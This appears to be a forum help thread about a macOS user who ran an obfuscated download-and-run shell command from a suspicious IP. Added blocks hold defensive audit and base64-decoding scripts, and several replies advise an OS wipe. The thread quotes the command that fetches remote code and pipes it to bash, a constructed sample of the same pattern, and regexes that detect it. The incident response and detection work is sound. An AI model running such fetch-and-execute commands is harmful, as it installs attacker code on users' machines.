Hey all,
I messed up big time by running a command I found on GitHub in my macOS Terminal, thinking it was for a legit tool. It turned out to be a malicious script from a Russian IP (217.119.139.117).
The command I executed was something like: `curl -sL http://217.119.139.117/xxx | bash`, but it was obfuscated using Base64. A few days later, I got a message from Google about "suspicious activity" on my account, and they blocked my access after I changed all my passwords.
Here are the steps I've taken so far:
1. **Network Check:** I ran `lsof -i -P | grep -i "ESTABLISHED"`—didn't find any connections to that IP.
2. **Persistence Check:**
- Inspected `~/Library/LaunchAgents`—only found legit files.
- Checked `crontab -l`—no jobs were listed.
- Reviewed files in `~/.zshrc` and `~/.zprofile`—they're either clean or nonexistent.
3. **Process Kill:** Executed `killall -9 bash` to make sure any background scripts were stopped.
4. **Deep Scan:** I used **KnockKnock** from Objective-See and MalwareBytes; both found no threats and confirmed only signed binaries from verified developers.
5. **File Audit:** Ran `find ~ -mmin -60` to check for hidden files made by the script—nothing unusual outside standard logs.
Now, I have a few questions:
1. Are there other places on macOS where scripts run via `nohup bash &` might hide besides LaunchAgents?
2. Given that this was likely an Infostealer and may have compromised my Google passwords, what's the risk for my password managers?
3. Which macOS system logs (`log show`) should I check to see what files the script accessed?
4. Is a full OS wipe necessary even if KnockKnock and MalwareBytes didn't find anything?
Thanks for any technical advice. I'm trying to avoid a full wipe if I can confirm that the payload didn't establish persistence.
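The persistence and log checks the question asks about (questions 1 and 3), as an added example that is not part of the original post or the poster's own commands: a POSIX shell audit of the locations this thread names (LaunchAgents, LaunchDaemons, Application Support, Caches, /tmp and the zsh/bash startup files) that flags recently modified files and any file referencing the IP from the post or a curl-pipe-to-shell pattern. The IoC address is the one in the question; the target list, the default time windows and the unified-log predicate are my own choices.

```shell
#!/bin/sh
# Added example (not the poster's own commands): audit the macOS locations
# this thread names for persistence, flagging recent changes and any file that
# references the IoC from the post or a curl-pipe-to-shell pattern.
# Assumption: run as the affected user; IOC_IP is the address from the post.

IOC_IP="217.119.139.117"

# Directories and shell startup files the thread names as places a script
# can persist or stage files. Paths under $HOME are resolved at call time.
persistence_targets() {
    printf '%s\n' \
        "$HOME/Library/LaunchAgents" \
        "/Library/LaunchAgents" \
        "/Library/LaunchDaemons" \
        "$HOME/Library/Application Support" \
        "$HOME/Library/Caches" \
        "/tmp" \
        "$HOME/.zshrc" "$HOME/.zprofile" "$HOME/.zshenv" \
        "$HOME/.bash_profile" "$HOME/.bashrc"
}

# scan_for_ioc TARGET [MINUTES]: TARGET is a file or directory. Prints
# "RECENT <path>" for files modified within MINUTES (default 1440, one day)
# and "IOC <path>" for files whose content mentions the IoC IP or pipes a
# curl/wget download straight into a shell. Missing targets are skipped.
scan_for_ioc() {
    target=$1
    mins=${2:-1440}
    [ -e "$target" ] || return 0
    # Escape the dots so the IP is matched literally in the ERE below.
    ioc_re=$(printf '%s' "$IOC_IP" | sed 's/\./\\./g')
    pipe_re='(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)'
    find "$target" -type f -mmin "-$mins" 2>/dev/null | while IFS= read -r f; do
        printf 'RECENT %s\n' "$f"
    done
    grep -rlE "$ioc_re|$pipe_re" "$target" 2>/dev/null | while IFS= read -r f; do
        printf 'IOC %s\n' "$f"
    done
}

# audit_persistence [MINUTES]: run scan_for_ioc over every target above.
audit_persistence() {
    persistence_targets | while IFS= read -r t; do
        scan_for_ioc "$t" "${1:-1440}"
    done
}

# unified_log_activity [WINDOW]: on macOS, pull curl, bash and launchd entries
# from the unified log for the last WINDOW (default 3d) to see what ran and
# when. log(1) only exists on macOS, so this is a no-op elsewhere.
unified_log_activity() {
    command -v log >/dev/null 2>&1 || { echo "log(1) not available on this host"; return 0; }
    log show --last "${1:-3d}" --style compact \
        --predicate 'process == "curl" OR process == "bash" OR process == "launchd"'
}

# Usage: sh audit.sh run   (audits the last 3 days, then dumps log activity)
if [ "${1:-}" = "run" ]; then
    audit_persistence 4320
    unified_log_activity 3d
fi
```

A file showing up as RECENT is only a lead, not a verdict; compare it against what you installed in that window. An IOC hit in a LaunchAgent plist or a startup file is the kind of evidence the scanners in step 4 can miss, since those files are plain text rather than binaries.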
5 Answers
A lot of malware can hide in specific directories on macOS. Make sure to check places like `~/Library/LaunchAgents`, `/Library/LaunchDaemons`, and `~/Library/Application Support` for anything suspicious. These can often be where malicious files set up camp.
Never pipe commands directly from untrusted sources; it can lead to serious issues like this. Always review scripts first. Given the risks, a full wipe is likely your best bet to ensure complete safety.
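Reviewing a script before running it, as an added example that is not from the thread: a POSIX shell helper that statically unwraps the base64 layers of a one-liner like the one in the question and flags a download piped into a shell, without executing anything. The sample one-liner in the demo branch is constructed (it uses the TEST-NET address 203.0.113.10), not the poster's command.

```shell
#!/bin/sh
# Added example (not from the thread): statically unwrap a base64-obfuscated
# one-liner so it can be read before anything runs. Nothing here executes the
# decoded text; it is only printed and pattern-checked.

# is_pipe_to_shell TEXT: succeed if TEXT fetches something with curl/wget and
# feeds it straight into a shell, the pattern used in the question.
is_pipe_to_shell() {
    printf '%s\n' "$1" |
        grep -qE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)'
}

# decode_b64_layers TEXT: find the first base64-looking run (20+ chars) in
# TEXT, decode it, and repeat on the result, at most 5 layers deep. Prints
# "layer N: <decoded>" per layer and "innermost: <text>" at the end, tagged
# PIPE-TO-SHELL if the innermost command matches is_pipe_to_shell.
decode_b64_layers() {
    cmd=$1
    depth=0
    while [ "$depth" -lt 5 ]; do
        blob=$(printf '%s\n' "$cmd" | grep -oE '[A-Za-z0-9+/]{20,}={0,2}' | head -n 1)
        [ -n "$blob" ] || break
        # --decode is accepted by both GNU and macOS base64.
        decoded=$(printf '%s' "$blob" | base64 --decode 2>/dev/null) || break
        [ -n "$decoded" ] || break
        depth=$((depth + 1))
        printf 'layer %d: %s\n' "$depth" "$decoded"
        cmd=$decoded
    done
    if is_pipe_to_shell "$cmd"; then
        printf 'innermost (PIPE-TO-SHELL): %s\n' "$cmd"
    else
        printf 'innermost: %s\n' "$cmd"
    fi
}

# Usage: sh review.sh 'echo <blob> | base64 --decode | bash'
#        sh review.sh demo   (runs the constructed sample below)
# The sample uses a TEST-NET address, not the poster's IP.
if [ "${1:-}" = "demo" ]; then
    sample=$(printf '%s' 'curl -sL http://203.0.113.10/setup.sh | bash' | base64 | tr -d '\n')
    decode_b64_layers "echo $sample | base64 --decode | bash"
elif [ -n "${1:-}" ]; then
    decode_b64_layers "$1"
fi
```

The decoder only peels base64; a one-liner that also compresses or evals its payload will stop at the first layer that is not plain text, which is itself a signal that the command deserves a closer look before it is run.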
Honestly, I'd recommend just wiping the OS completely. It’s the safest way to ensure that any hidden malware is completely gone. After that, change all your passwords everywhere and definitely enable two-factor authentication.
If you're unsure about what the script did, a full wipe is definitely the best route. Malicious scripts can operate stealthily, so it’s hard to know for sure if there's still something lurking around.
You should also look out for other sneaky spots like `/tmp` or `~/Library/Caches`. If you're manually hunting for malware, these are good places to investigate. Just remember to check the creation timestamps of any files—malware might try to mask its presence.